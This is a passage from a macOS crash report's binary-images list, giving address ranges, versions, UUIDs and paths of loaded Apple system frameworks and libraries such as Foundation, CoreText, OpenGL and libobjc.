0x7fffb2ec5000 - 0x7fffb2f75ffb com.apple.Metadata (10.7.0 - 1075.40) <DA911E1B-3977-386D-930D-96BD5085CB8E> /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/Metadata.framework/Versions/A/Metadata 0x7fffb2f76000 - 0x7fffb2fd5fff com.apple.CoreServices.OSServices (775.19 - 775.19) <C709A773-4FA0-33DD-B3E2-FBA41E00F177> /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/OSServices.framework/Versions/A/OSServices 0x7fffb2fd6000 - 0x7fffb3046fff com.apple.SearchKit (1.4.0 - 1.4.0) <7A6DDA2B-03F1-3137-BA9E-1CC211973E26> /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/SearchKit.framework/Versions/A/SearchKit 0x7fffb3047000 - 0x7fffb308cff7 com.apple.coreservices.SharedFileList (38 - 38) <DA096678-93AB-3291-BDE2-482F1D544589> /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/SharedFileList.framework/Versions/A/SharedFileList 0x7fffb3115000 - 0x7fffb3262ffb com.apple.CoreText (352.0 - 544.15) <BF0EE575-BB7E-3BF9-9029-232B4ADC24E4> /System/Library/Frameworks/CoreText.framework/Versions/A/CoreText 0x7fffb3263000 - 0x7fffb3298ff3 com.apple.CoreVideo (1.8 - 235.3) <AC11D5FB-C77B-34F5-B942-F698E84C229F> /System/Library/Frameworks/CoreVideo.framework/Versions/A/CoreVideo 0x7fffb3299000 - 0x7fffb330affb com.apple.framework.CoreWLAN (11.0 - 1200.31) <E47C0568-E37B-3052-9E77-F0F371DCDE7F> /System/Library/Frameworks/CoreWLAN.framework/Versions/A/CoreWLAN 0x7fffb3408000 - 0x7fffb340dfff com.apple.DiskArbitration (2.7 - 2.7) <8AC72143-D3C4-3AA6-84DF-734E3AFAC49B> /System/Library/Frameworks/DiskArbitration.framework/Versions/A/DiskArbitration 0x7fffb359f000 - 0x7fffb3945ff3 com.apple.Foundation (6.9 - 1349.81) <730B7944-BB43-35D5-A546-9F6CCED4B9F3> /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation 0x7fffb3971000 - 0x7fffb39a2ff7 com.apple.GSS (4.0 - 2.0) <6FADED0B-0425-3567-A75A-040C5A4638EB> /System/Library/Frameworks/GSS.framework/Versions/A/GSS 0x7fffb3a62000 - 0x7fffb3b05ffb com.apple.Bluetooth (5.0.4 - 5.0.4f18) <B3FED7E7-45EE-32DD-B59E-7942BCE9426C> /System/Library/Frameworks/IOBluetooth.framework/Versions/A/IOBluetooth 0x7fffb3b06000 - 0x7fffb3b9cff7 com.apple.framework.IOKit (2.0.2 - 1324.60.3) <7CE4C98B-107C-3AAA-B49A-F2ACFCBBF526> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit 0x7fffb3b9d000 - 0x7fffb3ba3ffb com.apple.IOSurface (159.7 - 159.7) <40550017-EF96-3C52-B400-806AFEE4B134> /System/Library/Frameworks/IOSurface.framework/Versions/A/IOSurface 0x7fffb3bf6000 - 0x7fffb3d56fef com.apple.ImageIO.framework (3.3.0 - 1599.10.2) <87AA4D39-0AFC-3A34-98EF-02710E2BF3CA> /System/Library/Frameworks/ImageIO.framework/Versions/A/ImageIO 0x7fffb3d57000 - 0x7fffb3d5bfff libGIF.dylib (1599.10.2) <6ED05614-1301-3452-943B-118F00F20C8D> /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libGIF.dylib 0x7fffb3d5c000 - 0x7fffb3e4cff7 libJP2.dylib (1599.10.2) <72C00423-55F0-3CAD-B198-EF00950791E6> /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJP2.dylib 0x7fffb3e4d000 - 0x7fffb3e70ffb libJPEG.dylib (1599.10.2) <78945614-990F-3705-A91C-46F717F7C635> /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJPEG.dylib 0x7fffb3e71000 - 0x7fffb3e98ff7 libPng.dylib (1599.10.2) <B800C14F-6E41-36B6-8DC1-1AE97A83A964> /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libPng.dylib 0x7fffb3e99000 - 0x7fffb3e9bff3 libRadiance.dylib (1599.10.2) <037D95B4-82A7-3A59-B3EB-0FF0977CF7A5> /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libRadiance.dylib 0x7fffb3e9c000 - 0x7fffb3eeafff libTIFF.dylib (1599.10.2) <CA2C7BF9-FDDB-36CF-B063-B075B29F8878> /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libTIFF.dylib 0x7fffb4c51000 - 0x7fffb4c6aff7 com.apple.Kerberos (3.0 - 1) <B9D242EB-E325-3A21-9812-C77CBBFB0D51> /System/Library/Frameworks/Kerberos.framework/Versions/A/Kerberos 0x7fffb5449000 - 0x7fffb54a4fff com.apple.Metal (87.18 - 87.18) <5C2F12FB-45C1-3103-A827-3D225BF8D05A> /System/Library/Frameworks/Metal.framework/Versions/A/Metal 0x7fffb5d8d000 - 0x7fffb5d95fff com.apple.NetFS (6.0 - 4.0) <14A24D00-5673-330A-959D-87F72040DEFF> /System/Library/Frameworks/NetFS.framework/Versions/A/NetFS 0x7fffb5f6c000 - 0x7fffb5f74ff7 libcldcpuengine.dylib (2.8.5) <73E1E526-01DF-3199-9B48-155F0329EF44> /System/Library/Frameworks/OpenCL.framework/Versions/A/Libraries/libcldcpuengine.dylib 0x7fffb5f75000 - 0x7fffb5fc3ff3 com.apple.opencl (2.8.6 - 2.8.6) <5FAF6F49-2648-39E6-922B-5630A5D7F7E4> /System/Library/Frameworks/OpenCL.framework/Versions/A/OpenCL 0x7fffb5fc4000 - 0x7fffb5fddffb com.apple.CFOpenDirectory (10.12 - 194) <A64E9A01-3F6E-36EA-9C10-88C564A68C9D> /System/Library/Frameworks/OpenDirectory.framework/Versions/A/Frameworks/CFOpenDirectory.framework/Versions/A/CFOpenDirectory 0x7fffb5fde000 - 0x7fffb5fe9ff7 com.apple.OpenDirectory (10.12 - 194) <4298FFD0-B1A7-3064-AF5B-708B3FA38671> /System/Library/Frameworks/OpenDirectory.framework/Versions/A/OpenDirectory 0x7fffb5fea000 - 0x7fffb5fecfff libCVMSPluginSupport.dylib (14.0.16) <A20EC348-37C9-33B6-9A81-06006F3214A1> /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCVMSPluginSupport.dylib 0x7fffb5fed000 - 0x7fffb5ff0ff7 libCoreFSCache.dylib (156.3) <687C4CC3-6537-344B-8BE1-5234C8CB2864> /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCoreFSCache.dylib 0x7fffb5ff1000 - 0x7fffb5ff5fff libCoreVMClient.dylib (156.3) <E7AEFCBE-B6BF-3C7C-9A4E-E78CB04DB794> /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCoreVMClient.dylib 0x7fffb5ff6000 - 0x7fffb5fffff7 libGFXShared.dylib (14.0.16) <63542E68-EB1A-3ECF-AAFB-E7B8AB313C70> /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGFXShared.dylib 0x7fffb6000000 - 0x7fffb600bfff libGL.dylib (14.0.16) <84BEED97-0A93-356D-A922-97EA311EA446> /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGL.dylib 0x7fffb600c000 - 0x7fffb6048ff7 libGLImage.dylib (14.0.16) <3518A85C-6905-3511-A6C9-2F82C519D28F> /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLImage.dylib 0x7fffb6049000 - 0x7fffb61bfff3 libGLProgrammability.dylib (14.0.16) <0EDA89D8-7C28-3D53-BDBA-7CB25232C329> /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLProgrammability.dylib 0x7fffb61c0000 - 0x7fffb6201ff7 libGLU.dylib (14.0.16) <9860DCF7-56E0-3A8F-A377-52635C9D8B27> /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLU.dylib 0x7fffb6b69000 - 0x7fffb6b77fff com.apple.opengl (14.0.16 - 14.0.16) <27E7D76E-A26B-39F8-8CF2-AB57920776A3> /System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL 0x7fffb76c9000 - 0x7fffb78c9fff com.apple.QuartzCore (1.11 - 453.39.3) <AB46D60D-17A8-3122-800E-2A9DA604FCBA> /System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore 0x7fffb7e30000 - 0x7fffb8132ff7 com.apple.security (7.0 - 57740.60.18) <021AACF6-D15F-37E0-840B-88853684BA00> /System/Library/Frameworks/Security.framework/Versions/A/Security 0x7fffb8133000 - 0x7fffb81a8fff com.apple.securityfoundation (6.0 - 55132.50.7) <4433C0CC-FE90-3DD3-BAC1-CC31D515B510> /System/Library/Frameworks/SecurityFoundation.framework/Versions/A/SecurityFoundation 0x7fffb81d3000 - 0x7fffb81d6ff3 com.apple.xpc.ServiceManagement (1.0 - 1) <9F285B19-B53B-3502-85A2-72C26DB40EA7> /System/Library/Frameworks/ServiceManagement.framework/Versions/A/ServiceManagement 0x7fffb855d000 - 0x7fffb85ccff7 com.apple.SystemConfiguration (1.14 - 1.14) <2412CDE0-C317-31EA-8F53-7A58BBFCC720> /System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration 0x7fffbae21000 - 0x7fffbae3cff3 com.apple.AppContainer (4.0 - 307.50.21) <C2E6BA3D-81FF-39C3-B4BF-DBB9A17DE078> /System/Library/PrivateFrameworks/AppContainer.framework/Versions/A/AppContainer 0x7fffbae3d000 - 0x7fffbae4aff3 com.apple.AppSandbox (4.0 - 307.50.21) <BF9FA426-8C11-358B-9E1F-A3901E3F2B14> /System/Library/PrivateFrameworks/AppSandbox.framework/Versions/A/AppSandbox 0x7fffbae4b000 - 0x7fffbae6dffb com.apple.framework.Apple80211 (12.0 - 1200.47) <B692048E-1B61-3DAF-9CBA-4D314E7562DC> /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Apple80211 0x7fffbae6e000 - 0x7fffbae7dfeb com.apple.AppleFSCompression (88.50.3 - 1.0) <478E8BFF-8BA2-375E-BE02-BA27F115C15A> /System/Library/PrivateFrameworks/AppleFSCompression.framework/Versions/A/AppleFSCompression 0x7fffbaf71000 - 0x7fffbaffc97f com.apple.AppleJPEG (1.0 - 1) <B9E9570D-04A4-34E4-B756-D200043B25B8> /System/Library/PrivateFrameworks/AppleJPEG.framework/Versions/A/AppleJPEG 0x7fffbb095000 - 0x7fffbb09cff7 com.apple.AssetCacheServices (48.3 - 48.3) <C59F7295-36D8-3109-A910-C83D884CC92C> /System/Library/PrivateFrameworks/AssetCacheServices.framework/Versions/A/AssetCacheServices 0x7fffbb42f000 - 0x7fffbb4adff7 com.apple.backup.framework (1.8.5 - 1.8.5) <CC679891-E8F5-3166-8EB6-AEA06954A52D> /System/Library/PrivateFrameworks/Backup.framework/Versions/A/Backup 0x7fffbc138000 - 0x7fffbc15fff3 com.apple.ChunkingLibrary (173 - 173) <FC2165F9-FC93-39C0-8323-C2F43A5E00A3> /System/Library/PrivateFrameworks/ChunkingLibrary.framework/Versions/A/ChunkingLibrary 0x7fffbc160000 - 0x7fffbc1ecff7 com.apple.CloudDocs (1.0 - 486.29) <751554B6-A09E-32A8-A604-9F1B1FD8B84D> /System/Library/PrivateFrameworks/CloudDocs.framework/Versions/A/CloudDocs 0x7fffbca84000 - 0x7fffbca8dffb com.apple.CommonAuth (4.0 - 2.0) <216950CB-269F-3476-BA17-D6363AC49FBC> /System/Library/PrivateFrameworks/CommonAuth.framework/Versions/A/CommonAuth 0x7fffbd1d5000 - 0x7fffbd1e5fff com.apple.CoreEmoji (1.0 - 40.3.3) <E9A28301-2D79-3A97-A046-028258A6ABE5> /System/Library/PrivateFrameworks/CoreEmoji.framework/Versions/A/CoreEmoji 0x7fffbd520000 - 0x7fffbd550ff3 com.apple.CoreServicesInternal (276.2 - 276.2) <05EB7D45-DD4C-3A0F-AC63-A0C2A68E6481> /System/Library/PrivateFrameworks/CoreServicesInternal.framework/Versions/A/CoreServicesInternal 0x7fffbd7e1000 - 0x7fffbd870ff7 com.apple.CoreSymbolication (62046) <7839CD8E-011D-3567-88DE-3D472C661136> /System/Library/PrivateFrameworks/CoreSymbolication.framework/Versions/A/CoreSymbolication 0x7fffbd871000 - 0x7fffbd9b0fe7 com.apple.coreui (2.1 - 431.3) <2E8FEC10-FC5B-3782-92DA-A85C24B7BF7C> /System/Library/PrivateFrameworks/CoreUI.framework/Versions/A/CoreUI 0x7fffbd9b1000 - 0x7fffbda81ff3 com.apple.CoreUtils (5.1 - 510.31) <E68BB8ED-8874-36EC-A7C5-1017C0E727CB> /System/Library/PrivateFrameworks/CoreUtils.framework/Versions/A/CoreUtils 0x7fffbdad1000 - 0x7fffbdb36ff3 com.apple.framework.CoreWiFi (12.0 - 1200.31) <DF0972EF-F817-3FD3-8C00-2D57B8738D8C> /System/Library/PrivateFrameworks/CoreWiFi.framework/Versions/A/CoreWiFi 0x7fffbdb37000 - 0x7fffbdb45ff7 com.apple.CrashReporterSupport (10.12 - 827) <14037A71-ECFE-394A-8D6E-2CECE98F02EE> /System/Library/PrivateFrameworks/CrashReporterSupport.framework/Versions/A/CrashReporterSupport 0x7fffbdbb7000 - 0x7fffbdbc1ffb com.apple.framework.DFRFoundation (1.0 - 104.25) <7CFF896C-EF22-3941-BB3D-F3615CE4C908> /System/Library/PrivateFrameworks/DFRFoundation.framework/Versions/A/DFRFoundation 0x7fffbdbc2000 - 0x7fffbdbc6ff3 com.apple.DSExternalDisplay (3.1 - 380) <A195C0CE-8E4E-384B-9556-8270E306FE1D> /System/Library/PrivateFrameworks/DSExternalDisplay.framework/Versions/A/DSExternalDisplay 0x7fffbdbfc000 - 0x7fffbdc71ffb com.apple.datadetectorscore (7.0 - 539.1) <9C312AAC-8AEE-3C72-BDE5-7FBF62452525> /System/Library/PrivateFrameworks/DataDetectorsCore.framework/Versions/A/DataDetectorsCore 0x7fffbdcad000 - 0x7fffbdcecfff com.apple.DebugSymbols (137 - 137) <58A70B66-2628-3CFE-B103-2200D95FC5F7> /System/Library/PrivateFrameworks/DebugSymbols.framework/Versions/A/DebugSymbols 0x7fffbdced000 - 0x7fffbddfefff com.apple.desktopservices (1.11.5 - 1.11.5) <46A9D4F3-1EF8-373C-98A4-AD48D285E484> /System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Versions/A/DesktopServicesPriv 0x7fffbe0e6000 - 0x7fffbe517ff7 com.apple.vision.FaceCore (3.3.2 - 3.3.2) <9391D5A3-738C-3136-9D07-518CB43DBADA> /System/Library/PrivateFrameworks/FaceCore.framework/Versions/A/FaceCore 0x7fffbf86e000 - 0x7fffbf86efff libmetal_timestamp.dylib (600.0.49.9) <E5EED927-1671-3390-BCBB-D76201D63C73> /System/Library/PrivateFrameworks/GPUCompiler.framework/libmetal_timestamp.dylib 0x7fffbf87b000 - 0x7fffbf886ff3 libGPUSupportMercury.dylib (14.0.16) <7E99C736-2F48-313E-BEF6-6F8BABFADD9F> /System/Library/PrivateFrameworks/GPUSupport.framework/Versions/A/Libraries/libGPUSupportMercury.dylib 0x7fffbfb3f000 - 0x7fffbfb5bfff com.apple.GenerationalStorage (2.0 - 267.1) <3DE1C580-D089-362D-8582-8DE68A3C5F13> /System/Library/PrivateFrameworks/GenerationalStorage.framework/Versions/A/GenerationalStorage 0x7fffbfb74000 - 0x7fffc0226fff com.apple.GeoServices (1.0 - 1228.24.9.30.34) <96BF97F6-8FF2-3FC4-A8C1-498CB7B0D9A0> /System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/GeoServices 0x7fffc026c000 - 0x7fffc02e2ff3 com.apple.Heimdal (4.0 - 2.0) <8F9C9041-66D5-36C9-8A4C-1658035C311D> /System/Library/PrivateFrameworks/Heimdal.framework/Versions/A/Heimdal 0x7fffc08fd000 - 0x7fffc0904ffb com.apple.IOAccelerator (311.13 - 311.13) <40C04C41-A76A-3687-8D64-F76E8C46AA81> /System/Library/PrivateFrameworks/IOAccelerator.framework/Versions/A/IOAccelerator 0x7fffc0906000 - 0x7fffc091aff7 com.apple.IOPresentment (1.0 - 29.10) <A3F7C1F6-CE50-3804-AAAF-7B75EBC46BE4> /System/Library/PrivateFrameworks/IOPresentment.framework/Versions/A/IOPresentment 0x7fffc091b000 - 0x7fffc093dfff com.apple.IconServices (74.4 - 74.4) <218DDD05-35F4-3833-B98D-471ED0EBC031> /System/Library/PrivateFrameworks/IconServices.framework/Versions/A/IconServices 0x7fffc0a24000 - 0x7fffc0bdbfff com.apple.LanguageModeling (1.0 - 123.2.5) <A8CA965F-0399-310D-91C3-B93DDDE9A442> /System/Library/PrivateFrameworks/LanguageModeling.framework/Versions/A/LanguageModeling 0x7fffc0cd7000 - 0x7fffc0d99ff3 com.apple.MMCS (1.3 - 385.4) <D3D76CE0-DE05-373E-B757-9E4B4920565D> /System/Library/PrivateFrameworks/MMCS.framework/Versions/A/MMCS 0x7fffc14fc000 - 0x7fffc1575ff7 com.apple.MetalPerformanceShaders.MetalPerformanceShaders (1.0 - 1) <C323FC94-FFA5-3EE6-B2AC-7E61EA92F304> /System/Library/PrivateFrameworks/MetalPerformanceShaders.framework/Versions/A/MetalPerformanceShaders 0x7fffc16ef000 - 0x7fffc1717ff7 com.apple.MultitouchSupport.framework (368.16 - 368.16) <512ADEC6-D694-3D73-A48A-6BE79CD39539> /System/Library/PrivateFrameworks/MultitouchSupport.framework/Versions/A/MultitouchSupport 0x7fffc17c9000 - 0x7fffc17d4fff com.apple.NetAuth (6.2 - 6.2) <97F487D6-8089-31A8-B68C-6C1EAC6ED1B5> /System/Library/PrivateFrameworks/NetAuth.framework/Versions/A/NetAuth 0x7fffc20ac000 - 0x7fffc20edff3 com.apple.PerformanceAnalysis (1.148.3 - 148.3) <6A21AB41-3AAA-32F3-9D46-2555A143A8B9> /System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/PerformanceAnalysis 0x7fffc279a000 - 0x7fffc27d4ff7 com.apple.ProtectedCloudStorage (1.0 - 1) <1C6083B7-F020-3634-8F53-CC9E07F27EC5> /System/Library/PrivateFrameworks/ProtectedCloudStorage.framework/Versions/A/ProtectedCloudStorage 0x7fffc27d5000 - 0x7fffc27effff com.apple.ProtocolBuffer (1 - 249.1) <A1F1B0F3-078F-378F-A9A9-0DEEA70E816A> /System/Library/PrivateFrameworks/ProtocolBuffer.framework/Versions/A/ProtocolBuffer 0x7fffc2808000 - 0x7fffc282bff3 com.apple.RemoteViewServices (2.0 - 124) <6B967FDA-6591-302C-BA0A-76C4856E584E> /System/Library/PrivateFrameworks/RemoteViewServices.framework/Versions/A/RemoteViewServices 0x7fffc34f2000 - 0x7fffc34f5fff com.apple.SecCodeWrapper (4.0 - 307.50.21) <F8E957B2-D3F0-3B73-B38C-AE8868F00939> /System/Library/PrivateFrameworks/SecCodeWrapper.framework/Versions/A/SecCodeWrapper 0x7fffc3584000 - 0x7fffc3611fff com.apple.Sharing (696.2.67 - 696.2.67) <F681EE28-153F-3216-97A6-6F5E4148AB2E> /System/Library/PrivateFrameworks/Sharing.framework/Versions/A/Sharing 0x7fffc3632000 - 0x7fffc3898fef com.apple.SkyLight (1.600.0 - 170.3) <83AB220F-48C0-3063-8ED3-ACDB69243B4D> /System/Library/PrivateFrameworks/SkyLight.framework/Versions/A/SkyLight 0x7fffc3a77000 - 0x7fffc3a83ff7 com.apple.SpeechRecognitionCore (3.3.2 - 3.3.2) <684BD1EA-8268-331C-A5A9-080EB375C658> /System/Library/PrivateFrameworks/SpeechRecognitionCore.framework/Versions/A/SpeechRecognitionCore 0x7fffc416f000 - 0x7fffc41e3fdf com.apple.Symbolication (62048.1) <1A30ED19-7532-3F46-9DD3-9879A973D0CF> /System/Library/PrivateFrameworks/Symbolication.framework/Versions/A/Symbolication 0x7fffc4622000 - 0x7fffc4628ff7 com.apple.TCC (1.0 - 1) <911B534B-4AC7-34E4-935E-E42ECD008CBC> /System/Library/PrivateFrameworks/TCC.framework/Versions/A/TCC 0x7fffc46b4000 - 0x7fffc477aff7 com.apple.TextureIO (2.8 - 2.8) <3D61E533-4156-3B21-B7ED-CB823E680DFC> /System/Library/PrivateFrameworks/TextureIO.framework/Versions/A/TextureIO 0x7fffc47ee000 - 0x7fffc47effff com.apple.TrustEvaluationAgent (2.0 - 28.50.1) <EBE65DD5-1732-3747-8C6C-7BECEBF089A4> /System/Library/PrivateFrameworks/TrustEvaluationAgent.framework/Versions/A/TrustEvaluationAgent 0x7fffc47f0000 - 0x7fffc4980ff3 com.apple.UIFoundation (1.0 - 490.7) <2A3063FE-1790-3510-8A0E-AEC581D42B7E> /System/Library/PrivateFrameworks/UIFoundation.framework/Versions/A/UIFoundation 0x7fffc544f000 - 0x7fffc550ffff com.apple.ViewBridge (283 - 283) <25A635B3-C87C-3D3A-ADF3-539713FA1048> /System/Library/PrivateFrameworks/ViewBridge.framework/Versions/A/ViewBridge 0x7fffc595a000 - 0x7fffc5960fff com.apple.XPCService (2.0 - 1) <4B28B225-2105-33F4-9ED0-F04288FF4FB1> /System/Library/PrivateFrameworks/XPCService.framework/Versions/A/XPCService 0x7fffc5a31000 - 0x7fffc5a33ffb com.apple.loginsupport (1.0 - 1) <F3140B97-12C3-35A7-9D3D-43DA2D13C113> /System/Library/PrivateFrameworks/login.framework/Versions/A/Frameworks/loginsupport.framework/Versions/A/loginsupport 0x7fffc5a88000 - 0x7fffc5aa3ff7 libCRFSuite.dylib (34) <F78B7F5F-0B4F-35C6-AA2F-84EE9CB22137> /usr/lib/libCRFSuite.dylib 0x7fffc5aa4000 - 0x7fffc5aaffff libChineseTokenizer.dylib (21) <0886E908-A825-36AF-B94B-2361FD8BC2A1> /usr/lib/libChineseTokenizer.dylib 0x7fffc5b41000 - 0x7fffc5b42ff3 libDiagnosticMessagesClient.dylib (102) <84A04D24-0E60-3810-A8C0-90A65E2DF61A> /usr/lib/libDiagnosticMessagesClient.dylib 0x7fffc5b43000 - 0x7fffc5d56fff libFosl_dynamic.dylib (16.39) <E22A4243-D148-3C74-BA15-2D906A3D1F9E> /usr/lib/libFosl_dynamic.dylib 0x7fffc5d72000 - 0x7fffc5d79fff libMatch.1.dylib (27) <70D4BD2A-9383-37F2-B0D6-9B592D236601> /usr/lib/libMatch.1.dylib 0x7fffc5d7a000 - 0x7fffc5d7afff libOpenScriptingUtil.dylib (172) <90743888-C1E8-34E3-924E-1A754B2B63B9> /usr/lib/libOpenScriptingUtil.dylib 0x7fffc5d7b000 - 0x7fffc5d7fffb libScreenReader.dylib (477.40.6) <CBE6420C-EF60-3ACD-A0B6-7CBE936BA3B8> /usr/lib/libScreenReader.dylib 0x7fffc5d80000 - 0x7fffc5d81ffb libSystem.B.dylib (1238.60.2) <FC9E9F13-3B18-305C-BE0A-97C7843652B0> /usr/lib/libSystem.B.dylib 0x7fffc5ded000 - 0x7fffc5e18ff3 libarchive.2.dylib (41.50.2) <B4F507BC-B24E-3BE7-B658-94D798E2CD81> /usr/lib/libarchive.2.dylib 0x7fffc5e19000 - 0x7fffc5e95fc7 libate.dylib (1.12.13) <D0767875-D02E-3377-84D8-5F174C27BEA9> /usr/lib/libate.dylib 0x7fffc5e99000 - 0x7fffc5e99ff3 libauto.dylib (187) <34388D0B-C539-3C1B-9408-2BC152162E43> /usr/lib/libauto.dylib 0x7fffc5e9a000 - 0x7fffc5eaaff3 libbsm.0.dylib (34) <20084796-B04D-3B35-A003-EA11459557A9> /usr/lib/libbsm.0.dylib 0x7fffc5eab000 - 0x7fffc5eb9ff7 libbz2.1.0.dylib (38) <ADFA329A-DCE7-356D-8F09-A3168DFC6610> /usr/lib/libbz2.1.0.dylib 0x7fffc5eba000 - 0x7fffc5f10ff7 libc++.1.dylib (307.5) <0B43BB5D-E6EB-3464-8DE9-B41AC8ED9D1C> /usr/lib/libc++.1.dylib 0x7fffc5f11000 - 0x7fffc5f3bfff libc++abi.dylib (307.3) <30199352-88BF-30BD-8CFF-2A4FBE247523> /usr/lib/libc++abi.dylib 0x7fffc5f3c000 - 0x7fffc5f4cffb libcmph.dylib (6) <2B5D405E-2D0B-3320-ABD6-622934C86ABE> /usr/lib/libcmph.dylib 0x7fffc5f4d000 - 0x7fffc5f63fcf libcompression.dylib (39) <F2726F95-F54E-3B21-BCB5-F7151DEFDC2F> /usr/lib/libcompression.dylib 0x7fffc5f64000 - 0x7fffc5f64ff7 libcoretls.dylib (121.50.4) <64B1001E-10F6-3542-A3B2-C4B49F51817F> /usr/lib/libcoretls.dylib 0x7fffc5f65000 - 0x7fffc5f66ff3 libcoretls_cfhelpers.dylib (121.50.4) <1A10303E-5EB0-3C7C-9165-021FCDFD934D> /usr/lib/libcoretls_cfhelpers.dylib 0x7fffc6020000 - 0x7fffc6105ff7 libcrypto.0.9.8.dylib (64.50.6) <D34E16A7-990A-37A9-933A-DFAA46554EAA> /usr/lib/libcrypto.0.9.8.dylib 0x7fffc62a3000 - 0x7fffc62f6ff7 libcups.2.dylib (450) <9950BFCB-7882-33C9-9ECF-CE66773C5657> /usr/lib/libcups.2.dylib 0x7fffc6371000 - 0x7fffc6371fff libenergytrace.dylib (15) <A1B040A2-7977-3097-9ADF-34FF181EB970> /usr/lib/libenergytrace.dylib 0x7fffc6381000 - 0x7fffc6386ff7 libheimdal-asn1.dylib (498.50.8) <A40E3196-235E-34CE-AD9A-8D1AFC5DE004> /usr/lib/libheimdal-asn1.dylib 0x7fffc6387000 - 0x7fffc6479ff7 libiconv.2.dylib (50) <42125B35-81D7-3FC4-9475-A26DBE10884D> /usr/lib/libiconv.2.dylib 0x7fffc647a000 - 0x7fffc669fffb libicucore.A.dylib (57165.0.1) <2931B842-2946-3576-AD1D-1CDA22FA1388> /usr/lib/libicucore.A.dylib 0x7fffc66a5000 - 0x7fffc66a6fff liblangid.dylib (126) <2085E7A7-9A34-3735-87F4-F174EF8EABF0> /usr/lib/liblangid.dylib 0x7fffc66a7000 - 0x7fffc66c0ffb liblzma.5.dylib (10) <44BD0279-99DD-36B5-8A6E-C11432E2098D> /usr/lib/liblzma.5.dylib 0x7fffc66c1000 - 0x7fffc66d7ff7 libmarisa.dylib (5) <9030D214-5D0F-30CB-AC03-902C63909362> /usr/lib/libmarisa.dylib 0x7fffc66d8000 - 0x7fffc6980ff7 libmecabra.dylib (744.8) <D429FCC9-42A4-38B3-8784-44024BC859EF> /usr/lib/libmecabra.dylib 0x7fffc69b3000 - 0x7fffc6a2dff3 libnetwork.dylib (856.60.1) <191E99F5-4723-3180-8013-02AF2F9AE4B8> /usr/lib/libnetwork.dylib 0x7fffc6a2e000 - 0x7fffc6e00047 libobjc.A.dylib (709) <DC77AA6E-A4E4-326D-8D7F-82D63AA88F99> /usr/lib/libobjc.A.dylib 0x7fffc6e03000 - 0x7fffc6e07fff libpam.2.dylib (21.30.1) <71EB0D88-DE84-3C8D-A2C5-58AA282BC5BC> /usr/lib/libpam.2.dylib 0x7fffc6e08000 - 0x7fffc6e39fff libpcap.A.dylib (67.60.1) <F6BC6ED6-AEE4-3520-B248-0C342636E2B0> /usr/lib/libpcap.A.dylib 0x7fffc6e56000 - 0x7fffc6e72ffb libresolv.9.dylib (64) <A244AE4C-00B0-396C-98FF-97FE4DB3DA30> /usr/lib/libresolv.9.dylib 0x7fffc6e73000 - 0x7fffc6eacfff libsandbox.1.dylib (592.60.1) <B3A1C3BD-084C-389B-9AFD-4BCFDBE9B5B6> /usr/lib/libsandbox.1.dylib 0x7fffc6ec2000 - 0x7fffc700fff7 libsqlite3.dylib (254.7) <07CD6DE3-394D-3C6A-A4B4-4CAB1054A041> /usr/lib/libsqlite3.dylib 0x7fffc7104000 - 0x7fffc7111fff libxar.1.dylib (357) <69547C64-E811-326F-BBED-490C6361BDCB> /usr/lib/libxar.1.dylib 0x7fffc7112000 - 0x7fffc7201ffb libxml2.2.dylib (30.16) <D2A6861B-D9FA-3BFC-B664-830C3FCE6065> /usr/lib/libxml2.2.dylib 0x7fffc7202000 - 0x7fffc722bfff libxslt.1.dylib (15.9) <00735AD5-B62D-3E83-86AC-5533E4E2B102> /usr/lib/libxslt.1.dylib 0x7fffc722c000 - 0x7fffc723dff3 libz.1.dylib (67) <46E3FFA2-4328-327A-8D34-A03E20BFFB8E> /usr/lib/libz.1.dylib 0x7fffc724c000 - 0x7fffc7250ff7 libcache.dylib (79) <093A4DAB-8385-3D47-A350-E20CB7CCF7BF> /usr/lib/system/libcache.dylib 0x7fffc7251000 - 0x7fffc725bfff libcommonCrypto.dylib (60092.50.5) <8A64D1B0-C70E-385C-92F0-E669079FDA90> /usr/lib/system/libcommonCrypto.dylib 0x7fffc725c000 - 0x7fffc7263fff libcompiler_rt.dylib (62) <55D47421-772A-32AB-B529-1A46C2F43B4D> /usr/lib/system/libcompiler_rt.dylib 0x7fffc7264000 - 0x7fffc726cfff libcopyfile.dylib (138) <819BEA3C-DF11-3E3D-A1A1-5A51C5BF1961> /usr/lib/system/libcopyfile.dylib 0x7fffc726d000 - 0x7fffc72f0fdf libcorecrypto.dylib (442.50.19) <65D7165E-2E71-335D-A2D6-33F78E2DF0C1> /usr/lib/system/libcorecrypto.dylib 0x7fffc72f1000 - 0x7fffc7322fff libdispatch.dylib (703.50.37) <6582BAD6-ED27-3B30-B620-90B1C5A4AE3C> /usr/lib/system/libdispatch.dylib 0x7fffc7323000 - 0x7fffc7328ffb libdyld.dylib (433.5) <EC3D88D2-3D40-3274-8E26-362C2D7352C8> /usr/lib/system/libdyld.dylib 0x7fffc7329000 - 0x7fffc7329ffb libkeymgr.dylib (28) <7AA011A9-DC21-3488-BF73-3B5B14D1FDD6> /usr/lib/system/libkeymgr.dylib 0x7fffc732a000 - 0x7fffc7336ffb libkxld.dylib 